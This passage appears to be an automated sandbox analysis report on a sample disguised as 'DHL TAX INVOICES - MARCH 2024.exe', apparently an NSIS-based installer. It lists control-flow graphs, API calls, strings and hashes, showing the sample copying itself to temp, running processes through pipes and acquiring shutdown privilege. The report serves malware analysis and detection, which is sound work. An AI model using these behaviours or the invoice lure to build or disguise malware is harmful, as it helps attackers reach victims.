3762->3763 3764 4059da lstrcatW 3762->3764 3766 405b7e 2 API calls 3763->3766 3765 4059ed 3764->3765 3768 4059fd lstrcatW 3765->3768 3771 405a08 lstrlenW FindFirstFileW 3765->3771 3766->3765 3769 405af3 3767->3769 3768->3771 3769->3759 3770 405af7 3769->3770 3772 405b32 3 API calls 3770->3772 3773 405ace 3771->3773 3779 405a2a 3771->3779 3774 405afd 3772->3774 3773->3760 3776 405927 5 API calls 3774->3776 3775 405ab1 FindNextFileW 3775->3779 3780 405ac7 FindClose 3775->3780 3778 405b09 3776->3778 3781 405b23 3778->3781 3782 405b0d 3778->3782 3779->3775 3786 40596f 62 API calls 3779->3786 3788 4052dd 25 API calls 3779->3788 3791 4052dd 25 API calls 3779->3791 3792 40601f 38 API calls 3779->3792 3794 40617e lstrcpynW 3779->3794 3795 405927 3779->3795 3780->3773 3784 4052dd 25 API calls 3781->3784 3782->3759 3785 4052dd 25 API calls 3782->3785 3784->3759 3787 405b1a 3785->3787 3786->3779 3789 40601f 38 API calls 3787->3789 3788->3775 3790 405b21 3789->3790 3790->3759 3791->3779 3792->3779 3793->3762 3794->3779 3803 405d2e GetFileAttributesW 3795->3803 3797 405954 3797->3779 3799 405942 RemoveDirectoryW 3801 405950 3799->3801 3800 40594a DeleteFileW 3800->3801 3801->3797 3802 405960 SetFileAttributesW 3801->3802 3802->3797 3804 405d40 SetFileAttributesW 3803->3804 3805 405933 3803->3805 3804->3805 3805->3797 3805->3799 3805->3800 3807 405ed5 3806->3807 3808 405efb GetShortPathNameW 3806->3808 3833 405d53 GetFileAttributesW CreateFileW 3807->3833 3810 405f10 3808->3810 3811 40601a 3808->3811 3810->3811 3813 405f18 wsprintfA 3810->3813 3811->3628 3812 405edf CloseHandle GetShortPathNameW 3812->3811 3814 405ef3 3812->3814 3815 4061a0 18 API calls 3813->3815 3814->3808 3814->3811 3816 405f40 3815->3816 3834 405d53 GetFileAttributesW CreateFileW 3816->3834 3818 405f4d 3818->3811 3819 405f5c GetFileSize GlobalAlloc 3818->3819 3820 406013 CloseHandle 3819->3820 3821 405f7e 3819->3821 3820->3811 3822 405dd6 ReadFile 3821->3822 3823 405f86 3822->3823 3823->3820 3835 405cb8 lstrlenA 3823->3835 3826 405fb1 3828 405cb8 4 API calls 3826->3828 3827 405f9d lstrcpyA 3829 405fbf 3827->3829 3828->3829 3830 405ff6 SetFilePointer 3829->3830 3831 405e05 WriteFile 3830->3831 3832 40600c GlobalFree 3831->3832 3832->3820 3833->3812 3834->3818 3836 405cf9 lstrlenA 3835->3836 3837 405d01 3836->3837 3838 405cd2 lstrcmpiA 3836->3838 3837->3826 3837->3827 3838->3837 3839 405cf0 CharNextA 3838->3839 3839->3836 4923 401b37 4924 401b44 4923->4924 4925 401b88 4923->4925 4926 401bcd 4924->4926 4931 401b5b 4924->4931 4927 401bb2 GlobalAlloc 4925->4927 4928 401b8d 4925->4928 4930 4061a0 18 API calls 4926->4930 4938 402288 4926->4938 4929 4061a0 18 API calls 4927->4929 4928->4938 4944 40617e lstrcpynW 4928->4944 4929->4926 4932 402282 4930->4932 4942 40617e lstrcpynW 4931->4942 4937 4058c3 MessageBoxIndirectW 4932->4937 4934 401b9f GlobalFree 4934->4938 4936 401b6a 4943 40617e lstrcpynW 4936->4943 4937->4938 4940 401b79 4945 40617e lstrcpynW 4940->4945 4942->4936 4943->4940 4944->4934 4945->4938 4946 402537 4947 402562 4946->4947 4948 40254b 4946->4948 4950 402596 4947->4950 4951 402567 4947->4951 4949 402ba2 18 API calls 4948->4949 4958 402552 4949->4958 4952 402bbf 18 API calls 4950->4952 4953 402bbf 18 API calls 4951->4953 4955 40259d lstrlenW 4952->4955 4954 40256e WideCharToMultiByte lstrlenA 4953->4954 4954->4958 4955->4958 4956 4025ca 4957 4025e0 4956->4957 4959 405e05 WriteFile 4956->4959 4958->4956 4958->4957 4960 405e34 5 API calls 4958->4960 4959->4957 4960->4956 4961 4014b8 4962 4014be 4961->4962 4963 401389 2 API calls 4962->4963 4964 4014c6 4963->4964 3899 4015b9 3900 402bbf 18 API calls 3899->3900 3901 4015c0 3900->3901 3902 405bdd 4 API calls 3901->3902 3914 4015c9 3902->3914 3903 401629 3905 40162e 3903->3905 3907 40165b 3903->3907 3904 405b5f CharNextW 3904->3914 3906 401423 25 API calls 3905->3906 3909 401635 3906->3909 3908 401423 25 API calls 3907->3908 3916 401653 3908->3916 3918 40617e lstrcpynW 3909->3918 3911 405829 2 API calls 3911->3914 3912 405846 5 API calls 3912->3914 3913 401642 SetCurrentDirectoryW 3913->3916 3914->3903 3914->3904 3914->3911 3914->3912 3915 40160f GetFileAttributesW 3914->3915 3917 4057ac 4 API calls 3914->3917 3915->3914 3917->3914 3918->3913 4972 40293b 4973 402ba2 18 API calls 4972->4973 4974 402941 4973->4974 4975 402964 4974->4975 4976 40297d 4974->4976 4984 40281e 4974->4984 4977 40297a 4975->4977 4980 402969 4975->4980 4978 402993 4976->4978 4979 402987 4976->4979 4987 4060c5 wsprintfW 4977->4987 4982 4061a0 18 API calls 4978->4982 4981 402ba2 18 API calls 4979->4981 4986 40617e lstrcpynW 4980->4986 4981->4984 4982->4984 4986->4984 4987->4984

                                                            Executed Functions

                                                            Function 10001112 Relevance: 128.3, APIs: 65, Strings: 8, Instructions: 582stringfilememoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 10001112-10001141 call 10001096 3 10001147-1000118b GetModuleFileNameW GlobalAlloc 0->3 4 1000128c-100012a8 GlobalAlloc 0->4 6 1000118e-10001192 3->6 5 100012aa-100012c0 4->5 7 100012c2-100012df FindWindowExW * 2 5->7 8 100012e4-100012f9 call 10001a33 call 10001849 5->8 9 10001194-100011ac CharPrevW 6->9 10 100011ae-100011b6 6->10 7->8 24 1000130a-10001318 lstrcmpiW 8->24 25 100012fb-10001308 call 100018af 8->25 9->6 9->10 12 100011b8-100011bd call 10001a73 10->12 13 100011ce-10001201 GetTempFileNameW CopyFileW 10->13 21 100011c2-100011c9 GlobalFree 12->21 16 10001203-10001237 CreateFileW CreateFileMappingW MapViewOfFile 13->16 17 1000126d-1000128a lstrcatW lstrlenW 13->17 18 10001239-10001259 UnmapViewOfFile 16->18 19 1000125f-1000126b CloseHandle * 2 16->19 17->5 18->19 19->17 23 100017d8-100017dc 21->23 27 10001326-10001329 24->27 28 1000131a 24->28 29 10001321-10001324 25->29 30 10001357-100013c8 GetVersion 27->30 31 1000132b-1000133a call 10001a73 27->31 28->29 29->8 34 100013ca-100013ce 30->34 35 100013fc-10001404 30->35 43 10001340-10001343 31->43 44 1000133c 31->44 37 100013d0-100013d7 34->37 38 100013d9 34->38 39 10001424-1000143b CreatePipe 35->39 40 10001406-10001421 InitializeSecurityDescriptor SetSecurityDescriptorDacl 35->40 45 100013de-100013ec GlobalAlloc 37->45 38->45 41 10001441-10001452 CreatePipe 39->41 42 100016f8-10001704 lstrcpyW 39->42 40->39 41->42 47 10001458-100014a0 GetStartupInfoW CreateProcessW 41->47 46 1000170a-1000170e 42->46 43->21 48 10001349-10001352 DeleteFileW 43->48 44->43 45->42 49 100013f2-100013f9 GlobalLock 45->49 50 10001710-10001713 call 10001a73 46->50 51 10001718-1000171c 46->51 47->42 52 100014a6-100014ac GetTickCount 47->52 48->21 49->35 50->51 55 10001731-10001738 51->55 56 1000171e-10001724 51->56 54 100014af-100014b7 52->54 57 100014c2-100014d6 PeekNamedPipe 54->57 58 100014b9-100014bc 54->58 60 1000173a-10001746 lstrcpyW 55->60 61 1000174c-10001753 55->61 56->55 59 10001726-10001730 call 100017dd 56->59 62 1000168b-10001690 57->62 63 100014dc-1000151a GetTickCount ReadFile call 100010d3 57->63 58->46 58->57 59->55 60->61 65 10001755-1000176a wsprintfW 61->65 66 1000176d-100017a6 call 10001a73 CloseHandle * 6 61->66 69 100016c0-100016c2 Sleep 62->69 70 10001692-1000169f GetTickCount 62->70 74 100016c8-100016f3 WaitForSingleObject GetExitCodeProcess PeekNamedPipe 63->74 78 10001520-1000152f lstrlenW 63->78 65->66 76 100017a8 66->76 77 100017ac-100017af 66->77 69->74 70->69 73 100016a1-100016be TerminateProcess lstrcpyW 70->73 73->74 74->54 76->77 79 100017b1-100017b4 DeleteFileW 77->79 80 100017ba-100017c8 GlobalFree 77->80 81 10001550-1000156b lstrlenW GlobalSize 78->81 82 10001531-1000154b lstrlenW lstrcpynW 78->82 79->80 80->23 83 100017ca-100017d6 GlobalUnlock GlobalFree 80->83 84 1000156d-1000158e GlobalUnlock GlobalReAlloc 81->84 85 1000159e-100015b0 lstrcatW 81->85 82->74 83->23 84->42 87 10001594-1000159b GlobalLock 84->87 86 1000160d-10001618 call 10001849 85->86 90 100015b2-100015c9 GlobalSize 86->90 91 1000161a-10001622 86->91 87->85 92 100015d4-100015e4 lstrlenW 90->92 93 100015cb-100015d2 90->93 91->74 94 10001628-1000162f 91->94 96 100015f3-10001602 lstrcpyW 92->96 97 100015e6-100015f1 92->97 95 10001607-1000160c 93->95 98 10001631-10001636 94->98 99 10001638-1000163c 94->99 95->86 96->95 97->96 97->97 100 10001668-1000166b 98->100 101 1000163e-10001641 99->101 102 1000165f-10001666 CharNextW 99->102 100->94 103 1000166d-10001670 100->103 104 10001649-1000164c 101->104 102->100 103->74 107 10001672-10001675 103->107 105 10001643-10001645 104->105 106 1000164e-1000165d call 100017dd 104->106 105->106 110 10001647-10001648 105->110 106->100 109 1000167e-10001684 107->109 112 10001686-10001689 109->112 113 10001677-1000167d 109->113 110->104 112->74 113->109
                                                            APIs
                                                              • Part of subcall function 10001096: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,0000003F,?,1000113F), ref: 100010A5
                                                              • Part of subcall function 10001096: GetProcAddress.KERNEL32(00000000), ref: 100010AC
                                                              • Part of subcall function 10001096: GetCurrentProcess.KERNEL32(?,?,0000003F,?,1000113F), ref: 100010BC
                                                            • GetModuleFileNameW.KERNEL32(?,00000104), ref: 10001159
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 10001171
                                                            • CharPrevW.USER32(?,?), ref: 1000119C
                                                            • GlobalFree.KERNEL32(00000000), ref: 100011C3
                                                            • GetTempFileNameW.KERNEL32(?,100030A4,00000000,?), ref: 100011E3
                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 100011F9
                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 10001211
                                                            • CreateFileMappingW.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 10001221
                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 1000122F
                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 10001259
                                                            • CloseHandle.KERNEL32(00000000), ref: 10001266
                                                            • CloseHandle.KERNEL32(?), ref: 1000126B
                                                            • lstrcatW.KERNEL32(00000000,100030A0), ref: 10001273
                                                            • lstrlenW.KERNEL32(00000000), ref: 1000127A
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 1000129D
                                                            • FindWindowExW.USER32(0001045C,00000000,#32770,00000000), ref: 100012D7
                                                            • FindWindowExW.USER32(00000000), ref: 100012DA
                                                            • lstrcmpiW.KERNEL32(00000000,/OEM,00000000), ref: 10001310
                                                            • DeleteFileW.KERNEL32(?,error), ref: 1000134C
                                                            • GetVersion.KERNEL32 ref: 10001394
                                                            • GlobalAlloc.KERNEL32(00000042,00002000), ref: 100013E1
                                                            • GlobalLock.KERNEL32(00000000), ref: 100013F3
                                                            • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1000140B
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 10001418
                                                            • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 10001437
                                                            • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 1000144E
                                                            • GetStartupInfoW.KERNEL32(00000044), ref: 1000145F
                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,?), ref: 10001498
                                                            • GetTickCount.KERNEL32 ref: 100014A6
                                                            • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 100014CD
                                                            • GetTickCount.KERNEL32 ref: 100014DC
                                                            • ReadFile.KERNEL32(?,100030B8,000003FF,?,00000000), ref: 100014F8
                                                            • lstrlenW.KERNEL32(?), ref: 10001529
                                                            • lstrlenW.KERNEL32(?,100034B8,00000400), ref: 1000153F
                                                            • lstrcpynW.KERNEL32(00000000), ref: 10001545
                                                            • lstrlenW.KERNEL32(100034B8), ref: 10001554
                                                            • GlobalSize.KERNEL32(00000002), ref: 10001560
                                                            • GlobalUnlock.KERNEL32(00000002), ref: 10001570
                                                            • GlobalReAlloc.KERNEL32(00000002,00000903,00000042), ref: 10001583
                                                            • GlobalLock.KERNEL32(00000000), ref: 10001595
                                                            • lstrcatW.KERNEL32(?,100034B8), ref: 100015A2
                                                            • GlobalSize.KERNEL32(00000002), ref: 100015B5
                                                            • lstrlenW.KERNEL32(00000000), ref: 100015D5
                                                            • lstrcpyW.KERNEL32(00000000, ), ref: 100015F9
                                                            • CharNextW.USER32(?), ref: 10001660
                                                            • GetTickCount.KERNEL32 ref: 10001692
                                                            • TerminateProcess.KERNEL32(?,000000FF), ref: 100016A6
                                                            • lstrcpyW.KERNEL32(?,timeout), ref: 100016B8
                                                            • Sleep.KERNELBASE(00000064), ref: 100016C2
                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 100016CC
                                                            • GetExitCodeProcess.KERNELBASE(?,?), ref: 100016DC
                                                            • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 100016ED
                                                            • lstrcpyW.KERNEL32(?,error), ref: 10001704
                                                            • lstrcpyW.KERNEL32(?,error), ref: 10001746
                                                            • wsprintfW.USER32 ref: 10001764
                                                            • CloseHandle.KERNEL32(?,?), ref: 10001782
                                                            • CloseHandle.KERNEL32(?), ref: 10001787
                                                            • CloseHandle.KERNEL32(?), ref: 1000178C
                                                            • CloseHandle.KERNEL32(?), ref: 10001791
                                                            • CloseHandle.KERNEL32(?), ref: 10001796
                                                            • CloseHandle.KERNEL32(?), ref: 1000179B
                                                            • DeleteFileW.KERNEL32(?), ref: 100017B4
                                                            • GlobalFree.KERNEL32(?), ref: 100017C3
                                                            • GlobalUnlock.KERNEL32(00000001), ref: 100017CD
                                                            • GlobalFree.KERNEL32(00000001), ref: 100017D6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1636843545.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1636824093.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000000.00000002.1636907483.0000000010002000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000000.00000002.1636928724.0000000010003000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000000.00000002.1636977025.0000000010004000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Global$File$Handle$Close$Createlstrlen$AllocPipeProcesslstrcpy$CountFreeTick$CharDeleteDescriptorFindLockModuleNameNamedPeekSecuritySizeUnlockViewWindowlstrcat$AddressCodeCopyCurrentDaclExitInfoInitializeMappingNextObjectPrevProcReadSingleSleepStartupTempTerminateUnmapVersionWaitlstrcmpilstrcpynwsprintf
                                                            • String ID: $#32770$/OEM$/TIMEOUT=$D$SysListView32$error$timeout
                                                            • API String ID: 4049317599-610251817
                                                            • Opcode ID: 4de4489b57b660db5782b176ed1e4333d4c0aa78f68f3c529f7b8b0113b7edee
                                                            • Instruction ID: 2677895ddf37c1053812e27609b1e6fbca017aada50ee4cc97fc4c080284ca28
                                                            • Opcode Fuzzy Hash: 4de4489b57b660db5782b176ed1e4333d4c0aa78f68f3c529f7b8b0113b7edee
                                                            • Instruction Fuzzy Hash: 26221871900219EFEB11DFA4CC88AEEBBBDFF48384F11406AE605A7169DB315E85CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004033B6 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 401stringfilecomCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 114 4033b6-4033e9 SetErrorMode GetVersion 115 4033eb-4033f3 call 406558 114->115 116 4033fc 114->116 115->116 122 4033f5 115->122 118 403401-403415 call 4064e8 lstrlenA 116->118 123 403417-40348b call 406558 * 2 #17 OleInitialize SHGetFileInfoW call 40617e GetCommandLineW call 40617e GetModuleHandleW 118->123 122->116 132 403495-4034af call 405b5f CharNextW 123->132 133 40348d-403494 123->133 136 4034b5-4034bb 132->136 137 4035c6-4035e0 GetTempPathW call 403385 132->137 133->132 138 4034c4-4034c8 136->138 139 4034bd-4034c2 136->139 146 4035e2-403600 GetWindowsDirectoryW lstrcatW call 403385 137->146 147 403638-403652 DeleteFileW call 402e41 137->147 141 4034ca-4034ce 138->141 142 4034cf-4034d3 138->142 139->138 139->139 141->142 144 403592-40359f call 405b5f 142->144 145 4034d9-4034df 142->145 160 4035a1-4035a2 144->160 161 4035a3-4035a9 144->161 150 4034e1-4034e9 145->150 151 4034fa-403533 145->151 146->147 166 403602-403632 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403385 146->166 162 403703-403713 call 4038d5 OleUninitialize 147->162 163 403658-40365e 147->163 155 4034f0 150->155 156 4034eb-4034ee 150->156 157 403550-40358a 151->157 158 403535-40353a 151->158 155->151 156->151 156->155 157->144 165 40358c-403590 157->165 158->157 164 40353c-403544 158->164 160->161 161->136 167 4035af 161->167 183 403839-40383f 162->183 184 403719-403729 call 4058c3 ExitProcess 162->184 168 4036f3-4036fa call 4039c7 163->168 169 403664-40366f call 405b5f 163->169 171 403546-403549 164->171 172 40354b 164->172 165->144 173 4035b1-4035bf call 40617e 165->173 166->147 166->162 176 4035c4 167->176 182 4036ff 168->182 187 403671-4036a6 169->187 188 4036bd-4036c7 169->188 171->157 171->172 172->157 173->176 176->137 182->162 185 403841-403857 GetCurrentProcess OpenProcessToken 183->185 186 4038bd-4038c5 183->186 190 403859-403887 LookupPrivilegeValueW AdjustTokenPrivileges 185->190 191 40388d-40389b call 406558 185->191 193 4038c7 186->193 194 4038cb-4038cf ExitProcess 186->194 192 4036a8-4036ac 187->192 195 4036c9-4036d7 call 405c3a 188->195 196 40372f-403743 call 405846 lstrcatW 188->196 190->191 210 4038a9-4038b4 ExitWindowsEx 191->210 211 40389d-4038a7 191->211 200 4036b5-4036b9 192->200 201 4036ae-4036b3 192->201 193->194 195->162 207 4036d9-4036ef call 40617e * 2 195->207 208 403750-40376a lstrcatW lstrcmpiW 196->208 209 403745-40374b lstrcatW 196->209 200->192 206 4036bb 200->206 201->200 201->206 206->188 207->168 208->162 213 40376c-40376f 208->213 209->208 210->186 214 4038b6-4038b8 call 40140b 210->214 211->210 211->214 216 403771-403776 call 4057ac 213->216 217 403778 call 405829 213->217 214->186 225 40377d-40378b SetCurrentDirectoryW 216->225 217->225 226 403798-4037c1 call 40617e 225->226 227 40378d-403793 call 40617e 225->227 231 4037c6-4037e2 call 4061a0 DeleteFileW 226->231 227->226 234 403823-40382b 231->234 235 4037e4-4037f4 CopyFileW 231->235 234->231 237 40382d-403834 call 40601f 234->237 235->234 236 4037f6-403816 call 40601f call 4061a0 call 40585e 235->236 236->234 246 403818-40381f CloseHandle 236->246 237->162 246->234
                                                            APIs
                                                            • SetErrorMode.KERNELBASE ref: 004033D9
                                                            • GetVersion.KERNEL32 ref: 004033DF
                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403408
                                                            • #17.COMCTL32(00000007,00000009), ref: 0040342B
                                                            • OleInitialize.OLE32(00000000), ref: 00403432
                                                            • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 0040344E
                                                            • GetCommandLineW.KERNEL32(00429240,NSIS Error), ref: 00403463
                                                            • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe",00000000), ref: 00403476
                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe",00000020), ref: 0040349D
                                                              • Part of subcall function 00406558: GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
                                                              • Part of subcall function 00406558: GetProcAddress.KERNEL32(00000000,?), ref: 00406585
                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004035D7
                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004035E8
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035F4
                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403608
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403610
                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403621
                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403629
                                                            • DeleteFileW.KERNELBASE(1033), ref: 0040363D
                                                              • Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B
                                                            • OleUninitialize.OLE32(?), ref: 00403708
                                                            • ExitProcess.KERNEL32 ref: 00403729
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 0040373C
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 0040374B
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403756
                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe",00000000,?), ref: 00403762
                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040377E
                                                            • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,?), ref: 004037D8
                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe,00420EE8,00000001), ref: 004037EC
                                                            • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000), ref: 00403819
                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403848
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0040384F
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403864
                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403887
                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004038AC
                                                            • ExitProcess.KERNEL32 ref: 004038CF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                            • String ID: "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\releve$C:\Users\user\AppData\Local\releve$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                            • API String ID: 2488574733-213317474
                                                            • Opcode ID: adc4d748d9836f5a15988fa3e2f94b2f0245c9efab62edd68d6b1bb0daacd0ec
                                                            • Instruction ID: be8551fa6605ebbbfda7487142ffb020be8bd547a3943651712312bea09c5587
                                                            • Opcode Fuzzy Hash: adc4d748d9836f5a15988fa3e2f94b2f0245c9efab62edd68d6b1bb0daacd0ec
                                                            • Instruction Fuzzy Hash: AED10571200300ABE7207F659D49A2B3AEDEB4074AF50443FF881B62D2DB7C8956876E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040541C Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 247 40541c-405437 248 4055c6-4055cd 247->248 249 40543d-405504 GetDlgItem * 3 call 404277 call 404b7a GetClientRect GetSystemMetrics SendMessageW * 2 247->249 251 4055f7-405604 248->251 252 4055cf-4055f1 GetDlgItem CreateThread FindCloseChangeNotification 248->252 271 405522-405525 249->271 272 405506-405520 SendMessageW * 2 249->272 254 405622-40562c 251->254 255 405606-40560c 251->255 252->251 256 405682-405686 254->256 257 40562e-405634 254->257 259 405647-405650 call 4042a9 255->259 260 40560e-40561d ShowWindow * 2 call 404277 255->260 256->259 265 405688-40568e 256->265 261 405636-405642 call 40421b 257->261 262 40565c-40566c ShowWindow 257->262 268 405655-405659 259->268 260->254 261->259 269 40567c-40567d call 40421b 262->269 270 40566e-405677 call 4052dd 262->270 265->259 273 405690-4056a3 SendMessageW 265->273 269->256 270->269 276 405535-40554c call 404242 271->276 277 405527-405533 SendMessageW 271->277 272->271 278 4057a5-4057a7 273->278 279 4056a9-4056d4 CreatePopupMenu call 4061a0 AppendMenuW 273->279 286 405582-4055a3 GetDlgItem SendMessageW 276->286 287 40554e-405562 ShowWindow 276->287 277->276 278->268 284 4056d6-4056e6 GetWindowRect 279->284 285 4056e9-4056fe TrackPopupMenu 279->285 284->285 285->278 288 405704-40571b 285->288 286->278 291 4055a9-4055c1 SendMessageW * 2 286->291 289 405571 287->289 290 405564-40556f ShowWindow 287->290 292 405720-40573b SendMessageW 288->292 293 405577-40557d call 404277 289->293 290->293 291->278 292->292 294 40573d-405760 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 292->294 293->286 296 405762-405789 SendMessageW 294->296 296->296 297 40578b-40579f GlobalUnlock SetClipboardData CloseClipboard 296->297 297->278
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000403), ref: 0040547A
                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405489
                                                            • GetClientRect.USER32(?,?), ref: 004054C6
                                                            • GetSystemMetrics.USER32(00000002), ref: 004054CD
                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054EE
                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054FF
                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405512
                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405520
                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405533
                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405555
                                                            • ShowWindow.USER32(?,00000008), ref: 00405569
                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040558A
                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040559A
                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055B3
                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055BF
                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405498
